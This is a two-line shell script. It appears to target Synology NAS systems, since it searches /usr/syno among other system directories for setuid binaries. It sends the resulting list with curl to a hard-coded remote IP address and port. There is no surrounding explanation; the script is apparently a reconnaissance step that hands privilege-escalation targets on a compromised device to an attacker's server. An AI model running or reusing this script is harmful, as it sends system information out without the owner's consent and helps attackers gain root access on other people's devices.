#!/bin/sh
find /usr/bin /usr/sbin /bin /sbin /usr/syno -perm -4000 -type f 2>&1 | curl -s -m 5 --data-binary @- http://202.79.169.91:28016/suid_fast
